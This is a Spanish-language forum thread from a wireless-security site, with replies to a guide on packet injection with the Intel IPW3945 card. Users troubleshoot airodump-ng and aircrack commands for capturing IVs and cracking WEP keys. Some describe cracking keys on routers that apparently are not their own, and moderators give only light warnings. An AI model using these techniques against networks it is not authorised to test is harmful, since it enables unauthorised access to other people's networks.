a lo que voy, ve probando hasta que encuentres =, alomejor es shift+2 o quizas alt+7, o quizas esté en el lugar de la coma ","  (quien sabe) solo eso prueba hasta que lo encuentres,

Suerte
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: aztka6969 en 09-09-2007, 17:42 (Domingo)
Hola fenomenos, estoy intentando romper la clave de mi router por primera vez, pero tengo un problemilla...... ¿como puedo averiguar el número de mi MAC desde el propio wifiway? ¿es el MAC el mismo en todos los sistemas operativos que esten en el ordenador (ya sean instalados en el HD o en live-cd)?   Muchiiiisimas gracias.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: ChimoC en 10-09-2007, 10:02 (Lunes)
Buenas:

La MAC te saldrá facilmente con el airodump (por ejemplo) y son los seis pares de números (BSSID ó STATION)

Un saludo

ChimoC
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: aztka6969 en 12-09-2007, 20:55 (Miércoles)
¿pero coincide la MAC en todos los sistemas operativos para el mismo ordenador? ??? ¿que depende de la tarjeta wifi o de donde se encuentre instalada en el ordenador??

 Gracias
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: daxwert en 19-11-2007, 18:39 (Lunes)
 :-\

Es lo mismo con una IPW2200

agradeceria tu opinion
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: ChimoC en 19-11-2007, 19:58 (Lunes)
Buenas:

aztka6969 la MAC es como el DNI de la tarjeta .... es "única e irrepetible" (hasta que utilices el macchanger .. for example  :P )... a lo que a tí te importa... tu MAC va a ser la misma en Windows, que en Linux que en Mac que en ... (me he quedao en blanco  ;D )

daxwert Por favor... los temas de la ipw2200 no los mezclemos con la ipw3945 (mira este post https://foro.seguridadwireless.net/index.php/topic,7117.0.html) y si tienes alguna duda postea allí o abre un post nuevo  ;)

Un saludo

ChimoC
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: Angelitoman en 21-12-2007, 11:00 (Viernes)
Hola soy nuevo en esto de Auditar redes y estoy empezando a usar wifislax, me han dicho más o menos como funciona, es más ya he sacado alguna que otra red, pero mi problema viene cuando no hay ningún usuario conectado a la red y hago el ataque 1 y el 3 pero no me captura ningún ARP, qué puede ser? tengo una IPW3945
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: tamalero en 17-01-2008, 06:10 (Jueves)
caballeros.. una aclaracion, al poner el comando :

Código: [Seleccionar]
Código:

airodump-ng -c CANAL DEL AP -w FICHERO GUARDA IVS rtap0
sin cerrar la ventana de mousepad, no hace nada
pero si la cierro, me dice que la forma de escribir es incorrecta
no se si sea una version diferente.... o que onda ( tengo el livecd 0.8 )
ahora por otro lado
para hacer funcionar al airodump-ng yo tuve que uar
airodump-ng --channel CANAL DEL AP --w FICHERO --ivs rtap0

asi es, con doble -....
cosa que me parecia muy raro
todo se captura perfecto, ahora el problema que el archivo es de tipo .IVS y no tipo CAP como dice tu manual.. por lo tanto el aircrack-ptw NO FUNCIONA con archivos .IVS...
asi que tuve que hacerme el trabajo colosal (aja...  ;D ) de usar aircrack-ng de 64 bits con parte fuerza bruta ( 150,000 IVS )
y despues de 20 mins, consegui la clave.. ahora....
intente usarla pero no funciona, pero al tronar otras del mismo tipo ( mismo modem y modelo 2wire.. diferentes numeros obviamente..) si funciono 1, el otro no... sucede el famoso error como si no tuvieran el DHCP  ( los modems 2wire te dejan conectarte, pero al menos que tengas la clave DHCP, no te mandan datos ni te dan IP )

y lo mas curioso que las claves son increiblemente raras, al traducir en HEX a ASCII, salen puros codigos raros, pero al meter la clave WEP en HEX ( dios salve a la aplicacion INTEL PRO WIRELESS que permiten claves en HEX ) si funciono la que habia dicho antes.. las otras no...
y eso que las 3 claves me decian que fueron decodificadas correctamente...

no se si sea error o que onda.. me encantaria un poco mas de informacion.
Ya que soy estudiante de Redes y honestamente, el estudio de redes WIRELESS que me dieron... no mostraron casi NADA de seguridad..

Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: chinitiw en 17-01-2008, 09:24 (Jueves)
dentro de que no tengo tu tarjeta y no te puedo ayudar en exceso, creo que hay post que comentan que lo puedes hacer a través de la interfaz wifi0 en vez de la rtap0 pruebalo, con respecto a las claves en hex, hay algunos ap que no las aceptan en ascii pero si en hex por eso que con la clave en ascii no te permite conectar.

Por otra parte, ¡¡¡ si no es tu red ojito !!!!

y recuerda : https://foro.seguridadwireless.net/index.php/topic,6093.0.html
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: lynus en 17-01-2008, 17:42 (Jueves)
gracias pude desencriptar una clave wep cxon mi toshiba satellite a105-...... que tiene esa tarjeta, pero si pudieras explicarme como desencripto una clave wpa con la misma tarjeta seria maravilloso un abrazo espero tu respuesta por si acaso mi mail es vladimir-murillo@hotmail.com by
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: lynus en 17-01-2008, 18:12 (Jueves)
como conseguir claves wpa no puedo realizarlo con mi lap helllllllllllllllllllllpppppppppp
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: tamalero en 17-01-2008, 18:57 (Jueves)
bueno, voy a ser honesto, no me respondiste bien... pero ahi va de nuevo para explicarlo mejor


1.- no tiene nada que ver con la tarjeta, si no con el programa
tengo la version liveCD0.8, no se si tu "paso a paso" haya sido en la verision 0.6
pero como dije.. LOS COMANDOS SON DIFERENTES y el programa GRABA EN .IVS y no en .CAP como dice tu guia.
2.- tengo la tarjeta 3945 (Centrino core2Duo de Dell ), no la habia mencionado antes, asi que ni idea porque dijiste "dentro de que no tengo tu tarjeta" , si ni la había mencionado.
pero voy aprobar con la interface wifi0 en ves de rtap0.
3.- sobre el paso #1 del programa AIRODUMP, como no graba en formato .CAP... el aircrack-ptw NO HABRE archivos  .IVS , solo .CAP

sobre lo legal, como pienso trabajar con este provedor de internet en cuanto termine mis estudios, es obvio que tengo que estudiar el equipo, y como veo, por default... estos modems son ridiculamente faciles de romper la clave. (y eso da sobresaturacion de soporte tecnico por "alentamiento" de red.. no me sorprenderia que hubiera mucha gente colgada de los modems-routers, especialmente los modelos antiguos (2WireXXX)
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: kyokorn en 17-01-2008, 22:18 (Jueves)
Hola

Haber corrijanme si estoy mal,. pero si pones airodump-ng -w archivo -c 6 rtap0, el programa te guarda en un archivo .cap por default, bueno aun asi en mexico hasta en los routers nuevos con BSID INFINITUMXXX son vulnerables se sigue usando WEP y se seguira usando, y para tu tarjeta ya hay miles de post aqui sobre eso aqui en el trabajo hay laptops con ipw3945 y el otro dia por curiosidad use airoway que esta en wifislax y fue sumanente facil y intuitivo usarlo asi que te recomiendo leer un poco mas,

Suerte

bueno, voy a ser honesto, no me respondiste bien... pero ahi va de nuevo para explicarlo mejor


1.- no tiene nada que ver con la tarjeta, si no con el programa
tengo la version liveCD0.8, no se si tu "paso a paso" haya sido en la verision 0.6
pero como dije.. LOS COMANDOS SON DIFERENTES y el programa GRABA EN .IVS y no en .CAP como dice tu guia.
2.- tengo la tarjeta 3945 (Centrino core2Duo de Dell ), no la habia mencionado antes, asi que ni idea porque dijiste "dentro de que no tengo tu tarjeta" , si ni la había mencionado.
pero voy aprobar con la interface wifi0 en ves de rtap0.
3.- sobre el paso #1 del programa AIRODUMP, como no graba en formato .CAP... el aircrack-ptw NO HABRE archivos  .IVS , solo .CAP

sobre lo legal, como pienso trabajar con este provedor de internet en cuanto termine mis estudios, es obvio que tengo que estudiar el equipo, y como veo, por default... estos modems son ridiculamente faciles de romper la clave. (y eso da sobresaturacion de soporte tecnico por "alentamiento" de red.. no me sorprenderia que hubiera mucha gente colgada de los modems-routers, especialmente los modelos antiguos (2WireXXX)

Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: tamalero en 17-01-2008, 22:49 (Jueves)
Hola

Haber corrijanme si estoy mal,. pero si pones airodump-ng -w archivo -c 6 rtap0, el programa te guarda en un archivo .cap por default, bueno aun asi en mexico hasta en los routers nuevos con BSID INFINITUMXXX son vulnerables se sigue usando WEP y se seguira usando, y para tu tarjeta ya hay miles de post aqui sobre eso aqui en el trabajo hay laptops con ipw3945 y el otro dia por curiosidad use airoway que esta en wifislax y fue sumanente facil y intuitivo usarlo asi que te recomiendo leer un poco mas,

Suerte

sobre el problema que el airodump-ng -w archivo -c6 rstap0
no hace nada.. simplemente se cierra sin decir nada.
aunque deje abierto el archivo como dicen los pasos, sigue cerrandose..
osea no habre la ventana con los canales ni captura nada...

por eso te decia que cuando intentaba usar el airodump-ng, los comandos no eran -w
sino --w ( con doble - ) usando el WIFIWAY 0.8. por eso preguntaba si hay diferencia , o si mi cd esta loco o no se  ;D

sobre los INfINITUMXXX, he notado que estos son un poco mas dificiles (en tiempo, ya que parece que tienen limitacion con respecto al numero de "inyeccion" que puedes hacer... con los 2WIRE con 4 barras de señal en windows, va hasta 350 packetes por segundo, con los INFINITUM con las mismas barras, son menos de 30 packetes por segundo. curioso no? )

y disculpame sobre lo del 3945, pero soy nuevo en este OS De linux. aparte de ubunto no he usado ningun distro linux , aparte que usaba todo desde WINDOWS ( excepto que en forma sniffer, ya que no he sabido de alguna manera de inyectar paquetes en windows con el 3945 )


y segun tu opinion personal, para una 3945, es mejor el WIFILAX o el WIFIWAY?

Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: Rob1nko en 26-01-2008, 13:20 (Sábado)
Buenos días,

Tengo la IPW3945 de un Acer Aspire...

Ni en Wifilax, ni en Wifi Way... me la detecta.
Arracando con ws nopcmcia ni de ninguna otra manera...

El boto de la Wifi evidentemente no sirve en Linux... pero no hay manera de activarla...

A alguien le ha pasado???
TIene solucion???

Llevo 2 días con esto... y no me la reconoce!!!

Espero comentarios..

Muchas gracias y saludos cordiales.


Robert.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: Rob1nko en 28-01-2008, 18:04 (Lunes)
Hola,

Nadie me puede hechar una mano con la IPW3945ABG, con el problema que describí más arriba???


Gracias y saludos.


Robert.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: hadrianweb en 28-01-2008, 19:20 (Lunes)
el boton wifi, si funciona en linux, lo que pasa que no aparece en la ventana, pero si funciona
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: Rob1nko en 28-01-2008, 21:56 (Lunes)
Ok, eso ya lo he compropado y si funciona,

Pero no consigo monitorizar ni recibir absolutamente nada,

Los drivers de WiFislax me da siempre Error.

Sabeis si existe alguna actualizacion para conseguir inyectar con esta tarjeta?

Gracias y saludos.


Robert.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: tamalero en 30-01-2008, 02:45 (Miércoles)
creo que ya vi el pequeño error de porque sucedía mi problema...

resulta que la guia usa el airodump-ng para hacer el archivo CAP
pero esto esta equivocado, al usar el airodump-ng , salen archivos .IVS y no .CAP
para usar el CAP es el archivo airodump normal..
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: svesda en 09-02-2008, 17:17 (Sábado)
Pero no consigo monitorizar ni recibir absolutamente nada,
Los drivers de WiFislax me da siempre Error.
Sabeis si existe alguna actualizacion para conseguir inyectar

Tengo la misma que tu IPW3945ABG y me funciona de lujo monitoriza perfecto , ahora corriendo con Wifislax 3.0 y currando con Airoscrip, ya te digo que de lujo,
pero tengo una preguntilla , a ver si alguien  sabe por que aunque este a 1 metro del router me da siempre señal -1 , pero bueno captura como dios, aunque no te de PW .

Saludos espero que te sirva.
pd. desde Wifislax ,tiene unas estupendas herramientas  para ese chip y otra cosa que se me olvido decirte , y es posible que te pase a ti, arranca con Winxp , conecta la wifi (pulsador azul creo ) una vez encendido cierra winxp , y a correr con el Live,
yo , personalmente si salia del P**O Xp con la wifi apagada al iniciar la Live no me funcionaba bien , la veia perfecto pero al escanear no veia ni una AP ni teniendo el router a una palma del laptop,

Lo dicho espero te sirva Saludos Chao.
Título: Ayuda con tarjeta ipw 3945
Publicado por: Eymi en 15-02-2008, 17:34 (Viernes)
Hola que tal de ante mano gracias por todos los post de los cuales he aprendido mucho , pero en este punto ya agote los post y creo que empiezanmis dudas estoy usando wifiway .8 o .6 que es la que se describe en varios manuales el problema que tengo es que cuando lanzo el airodump en cualquiera de las esplicaciones que dan los manuales no me aparece nada quiero pensar que mi tarjeta no esta abilitada para hacerlos por lo cual quiero ver si alguien me puede hayudar cunado lanzo el iwconfig me sale lo siguiente


wifiway:~# iwconfig
lo        no wireless extensions.

wifi0     unassociated  ESSID:off/any 
          Mode:Monitor  Channel=3  Bit Rate=54 Mb/s   
         
rtap0     no wireless extensions.

eth0      no wireless extensions.

no he podido capturar nada ni siquiera ver mi ap  pense en su momento que el problema era el trafico pero configure el ap en el canal 11 y defino ese canal para escuchar y nada puse a trabajar otra maquina de aqui de su casa para que ubiera trafico y nada no se que este haciendo mal o que me falte por hacer para que pueda capturar de cualquir manera sigo atento a los post que colocan aver si en alguno resulevo mi dudo pero si alguien me pdiera ayudar se los agradesco. y mis felicitaciones a los que postena resolviendo las dudas las explicaciones son mas que claras gracias y felicidades .
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: duit en 28-02-2008, 21:29 (Jueves)
Saludos, he leído todos los manuales para el intel pro wireless 3945 y he corrido el wifiway 0.8 satisfactoriamente, sin embargo solo logro llegar hasta el primer paso, despues de cambiar el canal al canal que obtengo al correr netumbler, donde también se obtiene la mac del AP, sin embargo al correr airodump en wifiway no me aparece ningun AP siendo que el router del wireless lo tengo instalado al lado en la PC de escritorio, puedo tardar un tiempo, intentar los 11 canales y nada, no aparece ningun AP. ¿A que se debe esto? como resolverlo por favor, cabe señalar que me aparecen las 4 interfases,  lo, eth0, wifi0, rtap0.  Gracias de antemano.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: cirusx en 04-03-2008, 20:03 (Martes)
ola tengo un problema

al querer autentificarme me pone esto

waiting for beacon frame (BSSID:XXXXXXXXXXXXXXXX)
sending authentication request
AP rejects the source MAC addres?
Authentication failed(code 1)

que puedo hacer????????
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: ChimoC en 05-03-2008, 22:00 (Miércoles)
Buenas:

Pues PRGA.... imagino que es eso... pero me da la sensación que no es tu ap... cuidadín  :-\

Un saludo

ChimoC

P.D.: Este hilo ya es muy largo... por favor dudas sobre la asociación e inyección en su subforo correspondiente.

Este es un hilo de MANUALES .... las cosultas de funcionamiento en otro sitio.

EDITO: Todos los post que a partir de éste pregunten cómo inyectar, cómo utilizar los archivos o cualquier cosa que se pueda preguntar en su subforo correspondiente.... será directamente BORRADO...... por favor esta es una sección de MANUALES... las consultas a su subforo correspondiente. Que en esos subforos podeis abrir cualquier hilo de preguntas
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: emudem en 10-06-2008, 21:04 (Martes)
He actualizado un poco el primer post con las nuevas distros, un script de hadrianweb y las pequeñas variaciones desde el año pasado a este.  ;)